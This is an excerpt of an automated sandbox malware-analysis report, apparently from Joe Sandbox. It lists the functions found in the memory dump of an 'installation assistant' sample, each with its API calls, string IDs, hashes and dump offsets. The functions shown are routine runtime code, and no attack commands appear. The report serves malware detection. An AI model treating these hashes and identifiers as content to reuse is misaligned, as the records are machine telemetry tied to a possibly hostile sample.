                                                          • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction Fuzzy Hash: 01127F74D19289DFCB04CFA4C694ADDBBB1FF09308F188469E845ABF51DB31AA45CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog__aulldiv
                                                          • String ID: $SJ
                                                          • API String ID: 4125985754-3948962906
                                                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction ID: 29899bcfb849f47ef2d2f0287f6aad1015ff0858049af47952655aaefb00660b
                                                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction Fuzzy Hash: 29B16DB1D0520ADFCB14CF95C9849EEBBF2FF48318B20852ED515A7B50D730AA45CB98
                                                          APIs
                                                            • Part of subcall function 6C697327: __EH_prolog3.LIBCMT ref: 6C69732E
                                                            • Part of subcall function 6C697327: std::_Lockit::_Lockit.LIBCPMT ref: 6C697339
                                                            • Part of subcall function 6C697327: std::locale::_Setgloballocale.LIBCPMT ref: 6C697354
                                                            • Part of subcall function 6C697327: _Yarn.LIBCPMT ref: 6C69736A
                                                            • Part of subcall function 6C697327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C6973A7
                                                            • Part of subcall function 6C562F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C562F95
                                                            • Part of subcall function 6C562F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C562FAF
                                                            • Part of subcall function 6C562F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C562FD0
                                                            • Part of subcall function 6C562F60: __Getctype.LIBCPMT ref: 6C563084
                                                            • Part of subcall function 6C562F60: std::_Facet_Register.LIBCPMT ref: 6C56309C
                                                            • Part of subcall function 6C562F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C5630B7
                                                          • std::ios_base::_Addstd.LIBCPMT ref: 6C56211B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 3332196525-1866435925
                                                          • Opcode ID: 4d0464543d303444dee1f99325a0791093883f2025a7aef3a20708f442be23dd
                                                          • Instruction ID: fdcc39b1639c9ce0ce53cc6f06d595508ddb49a8aeb581b35b22935db6773a37
                                                          • Opcode Fuzzy Hash: 4d0464543d303444dee1f99325a0791093883f2025a7aef3a20708f442be23dd
                                                          • Instruction Fuzzy Hash: 6041B1B0E003098FDB00CF65CC457AABBB1FF45318F148268E919ABB91D7759985CB95
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6F4ECC
                                                            • Part of subcall function 6C6DF58A: __EH_prolog.LIBCMT ref: 6C6DF58F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: :hJ$dJ$xJ
                                                          • API String ID: 3519838083-2437443688
                                                          • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction ID: 4df33ee6ff922de1498205bfd480244bd17e5ef128f086a81ccddb8e42044956
                                                          • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction Fuzzy Hash: 2921DCB0915B50CFC760CF6AC15428ABBF4FF2A704B40C95EC0AA97B11D7B8A508CF59
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C6AB0D0,6C561DEA,00008000,6C6AB0D0,?,?,?,6C6AAC7F,6C6AB0D0,?,00000000,6C561DEA), ref: 6C6AADC9
                                                          • GetLastError.KERNEL32(?,?,?,6C6AAC7F,6C6AB0D0,?,00000000,6C561DEA,?,6C6B469E,6C6AB0D0,000000FF,000000FF,00000002,00008000,6C6AB0D0), ref: 6C6AADD3
                                                          • __dosmaperr.LIBCMT ref: 6C6AADDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 2336955059-4022487301
                                                          • Opcode ID: bd9cee428c45ff64d722832627ef56bffa4089e79f30e26efce5cf636ba34348
                                                          • Instruction ID: a2853149bf99ab9c95b56ccf43a90773e5cc241692070e97624840d4fad4f045
                                                          • Opcode Fuzzy Hash: bd9cee428c45ff64d722832627ef56bffa4089e79f30e26efce5cf636ba34348
                                                          • Instruction Fuzzy Hash: 4A01D8337145157FCF059FAACC458EE3B79EB86325B250309F85197681EA71DD028BA8
                                                          APIs
                                                          • AcquireSRWLockExclusive.KERNEL32(6C79466C,?,652EF5AA,6C56230E,6C79430C), ref: 6C696B07
                                                          • ReleaseSRWLockExclusive.KERNEL32(6C79466C), ref: 6C696B3A
                                                          • WakeAllConditionVariable.KERNEL32(6C794668), ref: 6C696B45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                          • String ID: lFyl
                                                          • API String ID: 1466638765-2656733465
                                                          • Opcode ID: 92db779d184df0abd57070ca4812c268c00c719a534d14c05602434413b17ffd
                                                          • Instruction ID: 4b5b9883866423f2a794b55e3cae0d95d81b764291d626bceb693e91c82c242b
                                                          • Opcode Fuzzy Hash: 92db779d184df0abd57070ca4812c268c00c719a534d14c05602434413b17ffd
                                                          • Instruction Fuzzy Hash: 8BF030B8601900DFCB05EF99E888D747BB4FB4A351B024079F91987700C7706902CF64
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,6C69EF64,6C6C6DD8,0000000C), ref: 6C6A49B7
                                                          • _free.LIBCMT ref: 6C6A4A14
                                                          • _free.LIBCMT ref: 6C6A4A4A
                                                          • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C69EF64,6C6C6DD8,0000000C), ref: 6C6A4A55
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 4fa11f7b636d2a5e4e23d1009edc189b5a5fb8db0e5de4e16c6ffbd5f2fa2bcb
                                                          • Instruction ID: c89c54eb16b4885867abb651a3917334a32331f69691ef4bbb525ea465b17ed5
                                                          • Opcode Fuzzy Hash: 4fa11f7b636d2a5e4e23d1009edc189b5a5fb8db0e5de4e16c6ffbd5f2fa2bcb
                                                          • Instruction Fuzzy Hash: C2117336304200AB9A015DF95C84EBA36A99BC377DB251639F62996BC0DFB1CC1B412C
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C6B46EC,00000000,00000000,?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0), ref: 6C6B5ED1
                                                          • GetLastError.KERNEL32(?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?,6C6AB0D0,?,6C6ABD1C,6C6B5AB6), ref: 6C6B5EDD
                                                            • Part of subcall function 6C6B5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C6B5EED,?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?,6C6AB0D0), ref: 6C6B5F3E
                                                          • ___initconout.LIBCMT ref: 6C6B5EED
                                                            • Part of subcall function 6C6B5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C6B5EAB,6C6B4B3E,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?), ref: 6C6B5F22
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C6B46EC,00000000,?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?), ref: 6C6B5F02
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: a6f447e3d944614cf12be78d9f7656acc8448a10c7ea0eab2c01e8aa7189e438
                                                          • Instruction ID: 0c58b6053e02af3718e16f5de62485e058bc5e90b8d27774a74f8845fb2dcaba
                                                          • Opcode Fuzzy Hash: a6f447e3d944614cf12be78d9f7656acc8448a10c7ea0eab2c01e8aa7189e438
                                                          • Instruction Fuzzy Hash: FCF03036600115BBCF125FA2DC049E97F7AFB0A7A1F084011FA1996220CB728D30DF98
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog3_
                                                          • String ID: 8Q
                                                          • API String ID: 2427045233-4022487301
                                                          • Opcode ID: 9bd3a5aa47515743a5a95efc570f42591a1123d6c255a3d7d1b5aec74f9fc02a
                                                          • Instruction ID: 3f037684cb3a5344df13a31e462336d806a2dae9fb6b0bace0eff6e36930b89e
                                                          • Opcode Fuzzy Hash: 9bd3a5aa47515743a5a95efc570f42591a1123d6c255a3d7d1b5aec74f9fc02a
                                                          • Instruction Fuzzy Hash: F8719371D092969FDB108FD5C880AFE7AB5AF46318F144239EA20A7A40DF75DC47CB68
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6E8C5D
                                                            • Part of subcall function 6C6E761A: __EH_prolog.LIBCMT ref: 6C6E761F
                                                            • Part of subcall function 6C6E7A2E: __EH_prolog.LIBCMT ref: 6C6E7A33
                                                            • Part of subcall function 6C6E8EA5: __EH_prolog.LIBCMT ref: 6C6E8EAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: WZJ
                                                          • API String ID: 3519838083-1089469559
                                                          • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction ID: 0bf448975b53d8355274ad8bc2c743e7424eab87cbb48c136582bb4a76949c8c
                                                          • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction Fuzzy Hash: ED817B31D05158DFCF15DFA8D994ADDB7B5AF0A318F10409AE412777A0DB30AE09CB69
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: CK$CK
                                                          • API String ID: 3519838083-2096518401
                                                          • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                          • Instruction ID: b5a539e41bb368514e8141814d2837a19f9f411acda4fb382ab14b1d20e7dd0a
                                                          • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                          • Instruction Fuzzy Hash: 0D519175A04305DFDB00DFA5C9C4BEEB3B5FF88358F188529D901EBA45DB74AA058BA0
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6AA739
                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000,6C6AAB2D,00000000,00000000,00000000,?,?,6C6974B7,00000000), ref: 6C6AA7B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: Dt*%
                                                          • API String ID: 1834446548-1118161045
                                                          • Opcode ID: 82b14872fd8eb288297e32893e5d1a3450be3aba58986b5c1f1327db266cb3d7
                                                          • Instruction ID: fbc82c7e237e28e1921d9a16215b65b087066c589ceb821ed456d48f3e278142
                                                          • Opcode Fuzzy Hash: 82b14872fd8eb288297e32893e5d1a3450be3aba58986b5c1f1327db266cb3d7
                                                          • Instruction Fuzzy Hash: 6E410531B00154ABDB19CFA8CC80BE9B7B5EB49308F5482EAE54997642D770DD87CF98
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C6B46D6), ref: 6C6AD01B
                                                          • __dosmaperr.LIBCMT ref: 6C6AD022
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 1659562826-4022487301
                                                          • Opcode ID: 57d14b3ac652e6b9980d601ff2a393a910b0ed084951c327b93e3edff642e162
                                                          • Instruction ID: 97ca983ff8637800fd5d583892cea087deb84842a759d22b07bc1a8d35fc59f1
                                                          • Opcode Fuzzy Hash: 57d14b3ac652e6b9980d601ff2a393a910b0ed084951c327b93e3edff642e162
                                                          • Instruction Fuzzy Hash: 4B417771604194BFDB11DFA9C880AE97FA5EF4B318F248259E8828B641D3729D17C798
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: Dt*%
                                                          • API String ID: 269201875-1118161045
                                                          • Opcode ID: e9f3edce932101b75df6f02f2842653ecf22de4933595721fe5c328bb19028ef
                                                          • Instruction ID: e246eaa263bb87fe6429ec67384109491689f6c06da13ed310bf800c6736403b
                                                          • Opcode Fuzzy Hash: e9f3edce932101b75df6f02f2842653ecf22de4933595721fe5c328bb19028ef
                                                          • Instruction Fuzzy Hash: 9341B636A012019FCB10CFB8C880A9DB7F5EF89718B264569E515EF751EB31ED06CB85
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: U#Vl$q!Vl
                                                          • API String ID: 4218353326-3769553861
                                                          • Opcode ID: b3fdb5d119841f6e64e781221bc1ec6a4ae4fe2c9920c8f93be868603f11b821
                                                          • Instruction ID: 0a74ae9c525eb8989674cb271d474400401267ce266cfa4fa2563a9a4aebd4cc
                                                          • Opcode Fuzzy Hash: b3fdb5d119841f6e64e781221bc1ec6a4ae4fe2c9920c8f93be868603f11b821
                                                          • Instruction Fuzzy Hash: E741D5B2C003199BDB10DFA5DC84BDEBBB5EF59324F140125E809A7B50E7319948CBE5
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,6C6ABD83,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000), ref: 6C6AC570
                                                          • GetLastError.KERNEL32(6C6ABD83,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC,00000000), ref: 6C6AC5A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: Dt*%
                                                          • API String ID: 442123175-1118161045
                                                          • Opcode ID: 27da6e86933b16507a6cd90cd3690b9c7a6f52d6112653b33b285d75d797da73
                                                          • Instruction ID: cd5c6a50a89060bfec9c83381d37fb410d1ff044e676cc3116124c6467b0313f
                                                          • Opcode Fuzzy Hash: 27da6e86933b16507a6cd90cd3690b9c7a6f52d6112653b33b285d75d797da73
                                                          • Instruction Fuzzy Hash: 9031E671B00219AFDB18DF69CC81BEE77B5EF48304F1440A9E506D7690DB71EE818B64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 0|J$`)L
                                                          • API String ID: 3519838083-117937767
                                                          • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction ID: a3fb0d07b3e6dfe4fd5862c57ec359651d78be2f1ca7a51aecac31b3356078a1
                                                          • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction Fuzzy Hash: 7641C271301741EFCB119F60C590BEABBE2FF56208F00442EE56A97B50CB716904DB9A
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C6AB0D0,?,?,6C6ABD73,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000), ref: 6C6AC448
                                                          • GetLastError.KERNEL32(?,6C6ABD73,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC), ref: 6C6AC46E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: Dt*%
                                                          • API String ID: 442123175-1118161045
